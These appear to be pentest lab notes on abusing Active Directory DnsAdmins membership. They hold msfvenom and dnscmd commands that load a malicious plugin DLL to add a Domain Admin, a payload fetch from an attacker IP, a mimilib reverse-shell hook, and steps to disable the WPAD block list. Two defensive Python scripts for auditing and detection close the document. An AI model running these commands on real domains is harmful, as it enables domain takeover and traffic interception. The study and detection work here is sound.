# Intro

- Members of the [DnsAdmins](https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-security-groups#dnsadmins) group have access to DNS information on the network
- The Windows DNS service supports custom plugins and can call functions from them to resolve name queries that are not in the scope of any locally hosted DNS zones
- The Windows DNS service runs as `NT AUTHORITY\SYSTEM`, so membership in this group could potentially be leveraged to privesc on a DC, or in a situation where a separate server is acting as the DNS server for the domain
- It is possible to use the built-in [dnscmd](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd) utility to specify the path of the plugin DLL

# Attack Leveraging `DnsAdmins` Group Membership

- As detailed in this [post](https://adsecurity.org/?p=4064), the following attack can be performed when DNS is run on a DC:
    - DNS management is performed over RPC
    - [ServerLevelPluginDll](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dnsp/c9d38538-8827-44e6-aa5e-022a016ed723) allows us to load a custom DLL with zero verification of the DLL's path
    - This can be done with the `dnscmd` tool from the command line
    - When a member of the `DnsAdmins` group runs the `dnscmd` command below, the `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\DNS\Parameters\ServerLevelPluginDll` registry key is populated
    - When the DNS service is restarted, the DLL in this path will be loaded (e.g., from a network share that the Domain Controller's machine account can access)
    - An attacker can load a custom DLL to obtain a reverse shell, or even load a tool such as Mimikatz as a DLL to dump credentials

# Attack Sequence

- First, generate a malicious `.dll` with `msfvenom` that adds the `netadm` user to the `domain admins` group

```bash
msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll
```

- Next, serve up the payload from Kali and pull it down on the target

```powershell
wget "http://10.10.14.3:7777/adduser.dll" -outfile "adduser.dll"
```

- If we were to load the `.dll` as a non-privileged user, we would get an access denied error
- Confirm group membership

```powershell
Get-ADGroupMember -Identity DnsAdmins
```

- Load the malicious `.dll` with `dnscmd.exe`
- Note: Specify the absolute path to the malicious `.dll`

```cmd
dnscmd.exe /config /serverlevelplugindll C:\Users\netadm\Desktop\adduser.dll
```

- With the registry setting containing the path of our malicious plugin configured, and our payload created, the DLL will be loaded the next time the DNS service is started
- Note: Membership in the `DnsAdmins` group doesn't give the ability to restart the DNS service, but this is conceivably something that sysadmins might permit DNS admins to do
- After restarting the DNS service (if our user has this level of access), we should be able to run our custom DLL and add a user (in our case) or get a revshell
- If we do not have access to restart the DNS server, we will have to wait until the server or service restarts
- Next, we need to check our perms relative to the DNS service
- Below we will get the SID and then check perms on the DNS service

```cmd
wmic useraccount where name="netadm" get sid
sc.exe sdshow DNS
```

- According to this [article](https://www.winhelponline.com/blog/view-edit-service-permissions-windows/), we can see that our user has `RPWP` permissions, which translate to `SERVICE_START` and `SERVICE_STOP`
- Now that we know that we can start/stop the DNS service, let's do just that with `sc.exe`

```cmd
sc stop dns
sc start dns
```

- If all went well, `netadm` should be a member of the domain admins group
- Let's confirm

```cmd
net group "Domain Admins" /dom
```

# Cleanup

- Making config changes and stopping/restarting the DNS service on a DC are dangerous actions and must be exercised with great care
- As a pentester, we need to obtain client permission before taking these steps, because it could potentially take down DNS for an entire AD environment and cause many issues
- First, confirm that the `ServerLevelPluginDll` registry key exists
- Note: Until our custom DLL is removed, we will not be able to start the DNS service again correctly

```cmd
reg query \\10.129.43.9\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters
```

- Now, delete the registry key that points to our custom DLL

```cmd
reg delete \\10.129.43.9\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters /v ServerLevelPluginDll
```

- Start the DNS service again and check its status

```cmd
sc.exe start dns
sc.exe query dns
```

# Using `mimilib.dll`

- As detailed in this [post](http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html), we could also utilize [mimilib.dll](https://github.com/gentilkiwi/mimikatz/tree/master/mimilib) (as shown below) from the creator of the `Mimikatz` tool to gain command execution, by modifying the [kdns.c](https://github.com/gentilkiwi/mimikatz/blob/master/mimilib/kdns.c) file to execute a reverse shell one-liner or another command

```c
/*	Benjamin DELPY `gentilkiwi`
	https://blog.gentilkiwi.com
	[email protected]
	Licence : https://creativecommons.org/licenses/by/4.0/
*/
#include "kdns.h"

DWORD WINAPI kdns_DnsPluginInitialize(PLUGIN_ALLOCATOR_FUNCTION pDnsAllocateFunction, PLUGIN_FREE_FUNCTION pDnsFreeFunction)
{
	return ERROR_SUCCESS;
}

DWORD WINAPI kdns_DnsPluginCleanup()
{
	return ERROR_SUCCESS;
}

DWORD WINAPI kdns_DnsPluginQuery(PSTR pszQueryName, WORD wQueryType, PSTR pszRecordOwnerName, PDB_RECORD *ppDnsRecordListHead)
{
	FILE * kdns_logfile;
#pragma warning(push)
#pragma warning(disable:4996)
	if(kdns_logfile = _wfopen(L"kiwidns.log", L"a"))
#pragma warning(pop)
	{
		klog(kdns_logfile, L"%S (%hu)\n", pszQueryName, wQueryType);
		fclose(kdns_logfile);
		system("ENTER COMMAND HERE");
	}
	return ERROR_SUCCESS;
}
```

# Creating a WPAD Record

- Another way to abuse `DnsAdmins` group privileges is by creating a WPAD record
- Membership in the `DnsAdmins` group gives us the rights to [disable global query block security](https://docs.microsoft.com/en-us/powershell/module/dnsserver/set-dnsserverglobalqueryblocklist?view=windowsserver2019-ps), which by default blocks this attack
- Server 2008 first introduced the ability to add to a global query block list on a DNS server
- By default, Web Proxy Automatic Discovery Protocol (WPAD) and Intra-site Automatic Tunnel Addressing Protocol (ISATAP) are on the global query block list
- First, disable the global query block list

```powershell
Set-DnsServerGlobalQueryBlockList -Enable $false -ComputerName dc01.inlanefreight.local
```

- Now, add a WPAD record pointing to Kali

```powershell
Add-DnsServerResourceRecordA -Name wpad -ZoneName inlanefreight.local -ComputerName dc01.inlanefreight.local -IPv4Address 10.10.14.3
```

---

# Exercise

- `ping` test

![[images/Pasted image 20260219195706.png]]

- `nmap` scan

![[images/Pasted image 20260219195722.png]]

- `rdp` into target with given creds
- Light internal enum

![[images/Pasted image 20260219195854.png]]

- Note: `netadm` is a member of the `dnsadmins` group
- Create malicious payload on Kali

```bash
msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll
```

![[images/Pasted image 20260219200009.png]]

- Host malicious payload on Kali and `wget` it on the target

![[images/Pasted image 20260219200956.png]]

![[images/Pasted image 20260219201001.png]]

- Confirm group membership and load malicious payload

![[images/Pasted image 20260219200253.png]]

- Find SID for `netadm` and check perms on the DNS service

![[images/Pasted image 20260219200403.png]]

- We have `RPWP` perms, so start and stop the DNS service

![[images/Pasted image 20260219200445.png]]

- Confirm group membership

![[images/Pasted image 20260219201519.png]]

- Next, sign out and restart the `rdp` connection
- Confirm group memberships

![[images/Pasted image 20260219201752.png]]

- Now, `type c:\Users\Administrator\Desktop\DnsAdmins\flag.txt`
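The `sc.exe sdshow DNS` step above relies on reading the service's SDDL by eye to spot `RPWP`. The following is an added example, not code from the original notes or from any of the linked posts, that decodes a service DACL offline so a defender auditing a DC can list exactly which principals hold `SERVICE_START` and `SERVICE_STOP` on the DNS service. The SDDL string and the `S-1-5-21-...-1105` SID are constructed; `who_can_restart`, `effective_rights` and the other names are this example's own. It only matches ACEs naming the exact SID (or its well-known alias) and does not expand group membership.

```python
"""Decode a Windows service DACL (SDDL) to answer who can start or stop it.

Added example, not part of the original notes. Given the string that
`sc.exe sdshow DNS` prints, it maps SDDL two-letter rights to service
access rights (RP = SERVICE_START, WP = SERVICE_STOP) and evaluates the
allow/deny ACEs for one SID. SAMPLE_SDDL and NETADM_SID are constructed.
Simplification: only ACEs naming the exact SID (or its well-known alias)
are considered; group membership is not expanded.
"""
import re

# Service-specific and standard rights by SDDL code; the bit values are the
# SERVICE_* / standard-rights constants used in service security descriptors.
RIGHT_CODES = {
    "CC": ("SERVICE_QUERY_CONFIG", 0x0001),
    "DC": ("SERVICE_CHANGE_CONFIG", 0x0002),
    "LC": ("SERVICE_QUERY_STATUS", 0x0004),
    "SW": ("SERVICE_ENUMERATE_DEPENDENTS", 0x0008),
    "RP": ("SERVICE_START", 0x0010),
    "WP": ("SERVICE_STOP", 0x0020),
    "DT": ("SERVICE_PAUSE_CONTINUE", 0x0040),
    "LO": ("SERVICE_INTERROGATE", 0x0080),
    "CR": ("SERVICE_USER_DEFINED_CONTROL", 0x0100),
    "SD": ("DELETE", 0x10000),
    "RC": ("READ_CONTROL", 0x20000),
    "WD": ("WRITE_DAC", 0x40000),
    "WO": ("WRITE_OWNER", 0x80000),
}
# Generic rights resolved through the service object's generic mapping.
GENERIC = {
    "GA": 0xF01FF,  # SERVICE_ALL_ACCESS
    "GR": 0x2008D,  # READ_CONTROL | QUERY_CONFIG | QUERY_STATUS | ENUM_DEPENDENTS | INTERROGATE
    "GW": 0x20002,  # READ_CONTROL | CHANGE_CONFIG
    "GX": 0x20170,  # READ_CONTROL | START | STOP | PAUSE_CONTINUE | USER_DEFINED_CONTROL
}
# Well-known SDDL aliases that commonly appear in service DACLs.
WELL_KNOWN = {
    "SY": "S-1-5-18", "BA": "S-1-5-32-544", "BU": "S-1-5-32-545",
    "IU": "S-1-5-4", "SU": "S-1-5-6", "AU": "S-1-5-11",
    "NS": "S-1-5-20", "LS": "S-1-5-19", "WD": "S-1-1-0",
}
ACE_RE = re.compile(r"\(([A-Z]+);([A-Z]*);([^;]*);([^;]*);([^;]*);([^)]+)\)")
START, STOP = RIGHT_CODES["RP"][1], RIGHT_CODES["WP"][1]

# Constructed DNS service DACL with one extra allow ACE for a domain user.
NETADM_SID = "S-1-5-21-1111111111-2222222222-3333333333-1105"
SAMPLE_SDDL = (
    "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)"
    "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
    "(A;;CCLCSWLOCRRC;;;IU)"
    "(A;;CCLCSWLOCRRC;;;SU)"
    f"(A;;CCLCSWRPWPDTLOCRRC;;;{NETADM_SID})"
    "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
)


def parse_rights(field):
    """Turn an SDDL rights field (hex or two-letter codes) into an access mask."""
    field = field.strip()
    if field.lower().startswith("0x"):
        return int(field, 16)
    mask = 0
    for i in range(0, len(field), 2):
        code = field[i:i + 2]
        if code in RIGHT_CODES:
            mask |= RIGHT_CODES[code][1]
        elif code in GENERIC:
            mask |= GENERIC[code]
        else:
            raise ValueError(f"unknown SDDL right {code!r}")
    return mask


def dacl_aces(sddl):
    """Yield (ace_type, trustee_sid, mask) for each ACE in the D: section only."""
    m = re.search(r"D:[A-Z]*((?:\([^)]*\))+)", sddl)
    if not m:
        return
    for ace_type, _flags, rights, _obj, _iobj, sid in ACE_RE.findall(m.group(1)):
        yield ace_type, WELL_KNOWN.get(sid, sid), parse_rights(rights)


def effective_rights(sddl, sid):
    """Allow bits minus deny bits for ACEs naming exactly this SID or alias."""
    sid = WELL_KNOWN.get(sid, sid)
    allowed = denied = 0
    for ace_type, trustee, mask in dacl_aces(sddl):
        if trustee != sid:
            continue
        if ace_type == "A":
            allowed |= mask
        elif ace_type == "D":
            denied |= mask
    return allowed & ~denied


def right_names(mask):
    """Human-readable names for the bits set in a service access mask."""
    return sorted(name for name, bit in RIGHT_CODES.values() if mask & bit)


def can_restart_service(sddl, sid):
    """True when the SID holds both SERVICE_START and SERVICE_STOP."""
    mask = effective_rights(sddl, sid)
    return bool(mask & START) and bool(mask & STOP)


def who_can_restart(sddl):
    """Sorted list of trustees in the DACL that can start and stop the service."""
    trustees = {trustee for _t, trustee, _m in dacl_aces(sddl)}
    return sorted(t for t in trustees if can_restart_service(sddl, t))


if __name__ == "__main__":
    for trustee in who_can_restart(SAMPLE_SDDL):
        print(trustee, right_names(effective_rights(SAMPLE_SDDL, trustee)))
```

Feed it the real `sc.exe sdshow DNS` output and the SIDs of `DnsAdmins` members to confirm whether the "sysadmins might permit DNS admins to restart the service" caveat actually applies on a given DC; any non-default trustee that shows up in `who_can_restart` is the finding to raise.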
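Both techniques in these notes leave a clear trail on the DNS server: a write to `ServerLevelPluginDll` under `HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters`, and a disabled or thinned global query block list followed by a `wpad` record. The following is an added example, not code from the original notes or any linked post, of the detection and audit logic a defender would run over that evidence. The log lines are constructed, flattened `Key=Value` renderings modelled on Sysmon registry events (Event ID 12/13 with `EventType`, `Image`, `User`, `TargetObject`, `Details`), not real Sysmon output, and the block-list and zone data are constructed to resemble what `Get-DnsServerGlobalQueryBlockList` and a zone export would show; `detect_plugin_changes`, `audit_global_query_block_list` and the other names are this example's own.

```python
"""Flag ServerLevelPluginDll changes and WPAD/ISATAP block-list weakening.

Added example, not from the original notes. SAMPLE_EVENTS are constructed
key=value lines modelled on Sysmon registry events; the field names follow
Sysmon's schema but the flat format is an assumption made for this example.
The block-list / zone inputs are constructed as well.
"""
import re
from dataclasses import dataclass

PLUGIN_VALUE = r"\services\dns\parameters\serverlevelplugindll"
BLOCKED_BY_DEFAULT = ("wpad", "isatap")
SYSTEM32_PREFIXES = ("c:\\windows\\system32\\", "%systemroot%\\system32\\")


@dataclass
class Finding:
    severity: str  # "high", "medium" or "info"
    message: str


# Constructed: the plugin value is written by the DNS server process after a
# dnscmd /config arrives over RPC; a benign Forwarders change and the cleanup
# `reg delete` from the notes are included to show what is and is not flagged.
SAMPLE_EVENTS = [
    r"EventID=13 EventType=SetValue Image=C:\Windows\System32\dns.exe User=NT AUTHORITY\SYSTEM "
    r"TargetObject=HKLM\System\CurrentControlSet\Services\DNS\Parameters\ServerLevelPluginDll "
    r"Details=C:\Users\netadm\Desktop\adduser.dll",
    r"EventID=13 EventType=SetValue Image=C:\Windows\System32\dns.exe User=NT AUTHORITY\SYSTEM "
    r"TargetObject=HKLM\System\CurrentControlSet\Services\DNS\Parameters\Forwarders Details=Binary Data",
    r"EventID=12 EventType=DeleteValue Image=C:\Windows\System32\reg.exe User=INLANEFREIGHT\netadm "
    r"TargetObject=HKLM\System\CurrentControlSet\Services\DNS\Parameters\ServerLevelPluginDll",
]


def parse_event(line):
    """Split 'Key=Value Key2=Value2 ...' into a dict; values may contain spaces."""
    fields = {}
    for chunk in re.split(r"\s+(?=[A-Za-z]+=)", line.strip()):
        key, _, value = chunk.partition("=")
        fields[key] = value
    return fields


def classify_plugin_path(path):
    """Severity for a ServerLevelPluginDll value: any non-empty value is notable,
    a UNC path or a path outside System32 is the pattern described in the notes."""
    p = path.strip().lower()
    if not p:
        return "info", "ServerLevelPluginDll cleared (expected during cleanup)"
    if p.startswith("\\\\"):
        return "high", f"ServerLevelPluginDll points to a UNC path: {path}"
    if not p.startswith(SYSTEM32_PREFIXES):
        return "high", f"ServerLevelPluginDll points outside System32: {path}"
    return "medium", f"ServerLevelPluginDll set to {path}; verify it is an approved plugin"


def detect_plugin_changes(lines):
    """Return findings for every registry event touching ServerLevelPluginDll."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if not ev.get("TargetObject", "").lower().endswith(PLUGIN_VALUE):
            continue
        who = f"(by {ev.get('Image', '?')}, user {ev.get('User', '?')})"
        if ev.get("EventType") == "DeleteValue":
            findings.append(Finding("info", f"ServerLevelPluginDll value deleted {who}"))
            continue
        sev, msg = classify_plugin_path(ev.get("Details", ""))
        findings.append(Finding(sev, f"{msg} {who}"))
    return findings


def audit_global_query_block_list(enabled, entries, zone_records):
    """Flag a disabled block list, missing default names, and wpad/isatap records.

    zone_records: iterable of (name, record_type, data) from a zone export.
    """
    findings = []
    if not enabled:
        findings.append(Finding("high", "GlobalQueryBlockList is disabled; wpad/isatap names resolve"))
    present = {e.lower() for e in entries}
    for name in BLOCKED_BY_DEFAULT:
        if name not in present:
            findings.append(Finding("medium", f"'{name}' missing from GlobalQueryBlockList"))
    for name, rtype, data in zone_records:
        host = name.lower().split(".")[0]
        if host not in BLOCKED_BY_DEFAULT or rtype.upper() not in ("A", "AAAA", "CNAME"):
            continue
        if enabled and host in present:
            findings.append(Finding("medium", f"{rtype} record '{name}' -> {data} exists but is blocked by the list"))
        else:
            findings.append(Finding("high", f"{rtype} record '{name}' -> {data} resolves; clients will auto-discover it"))
    return findings


if __name__ == "__main__":
    for f in detect_plugin_changes(SAMPLE_EVENTS):
        print(f.severity.upper(), f.message)
    for f in audit_global_query_block_list(False, ["wpad", "isatap"], [("wpad", "A", "10.10.14.3")]):
        print(f.severity.upper(), f.message)
```

The value-deleted finding is kept at `info` on purpose: the same event is produced by the legitimate cleanup in these notes and by an attacker covering tracks, so it is context for the preceding `high` finding rather than an alert on its own. Note that a `wpad` record is reported even while the block list still covers it, since a single `Set-DnsServerGlobalQueryBlockList -Enable $false` would turn it live.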